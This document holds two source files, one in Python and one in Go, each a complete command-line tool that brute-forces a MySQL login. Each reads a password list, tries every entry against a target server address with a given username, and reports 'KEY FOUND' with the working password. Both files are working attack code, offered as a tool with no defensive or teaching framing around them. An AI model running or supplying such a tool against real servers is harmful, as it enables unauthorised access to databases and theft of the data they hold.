File: mysql.py
import mysql.connector
from mysql.connector import Error
import argparse

def brute_force_mysql(host, user, password_list):
    try:
        # Try each password in the list
        for password in password_list:
            try:
                # Try to connect with the current password
                connection = mysql.connector.connect(
                    host=host,
                    user=user,
                    password=password
                )
                
                if connection.is_connected():
                    print(f"KEY FOUND: {password}")
                    connection.close()
                    return
            except Error as e:
                # If connection fails, print the error (optional)
                pass
        print("KEY NOT FOUND")
    except Exception as e:
        print(f"Error: {str(e)}")

def load_password_list(file_path):
    with open(file_path, 'r') as file:
        return [line.strip() for line in file.readlines()]

def main():
    # Parse command-line arguments
    parser = argparse.ArgumentParser(description="Brute force MySQL password for a given user.")
    parser.add_argument("-l", "--username", required=True, help="The MySQL username.")
    parser.add_argument("-P", "--password-list", required=True, help="Path to the password list file.")
    parser.add_argument("mysql_url", help="MySQL target in the format mysql://<target_ip>")
    
    args = parser.parse_args()

    # Extract target IP from the URL
    target_ip = args.mysql_url.split("//")[1]
    
    # Load password list from the specified file
    password_list = load_password_list(args.password_list)

    # Call the brute force function
    brute_force_mysql(target_ip, args.username, password_list)

if __name__ == "__main__":
    main()

File: mysql.go
package main

import (
	"database/sql"
	"flag"
	"fmt"
	"log"
	"os"
	"strings"

	_ "github.com/go-sql-driver/mysql"
)

func main() {
	// Command-line flags
	username := flag.String("l", "", "Username for MySQL")
	passwordListFile := flag.String("P", "", "File containing list of passwords")
	target := flag.String("mysl", "", "Target MySQL IP address (format: <ip>:<port>)")
	flag.Parse()

	// Validate flags
	if *username == "" || *passwordListFile == "" || *target == "" {
		fmt.Println("Usage: brute.go -l <username> -P <password_list> -mysl <target_ip>")
		os.Exit(1)
	}

	// Read the password list file
	passwords, err := readPasswordList(*passwordListFile)
	if err != nil {
		log.Fatalf("Error reading password list: %v\n", err)
	}

	// Attempt to brute force the MySQL login
	for _, password := range passwords {
		fmt.Printf("Trying password: %s\n", password)
		if tryLogin(*username, password, *target) {
			fmt.Printf("KEY FOUND: %s\n", password)
			return
		}
	}

	// If we reach here, no valid password was found
	fmt.Println("KEY NOT FOUND")
}

// readPasswordList reads the password list from a file
func readPasswordList(filename string) ([]string, error) {
	data, err := os.ReadFile(filename)
	if err != nil {
		return nil, err
	}
	passwords := strings.Split(string(data), "\n")
	return passwords, nil
}

// tryLogin attempts to log in to the MySQL server with the provided username and password
func tryLogin(username, password, target string) bool {
	// Build the connection string
	dsn := fmt.Sprintf("%s:%s@tcp(%s)/", username, password, target)

	// Try to open a connection to MySQL
	db, err := sql.Open("mysql", dsn)
	if err != nil {
		return false
	}
	defer db.Close()

	// Try a simple query to test login
	err = db.Ping()
	if err == nil {
		return true
	}
	return false
}
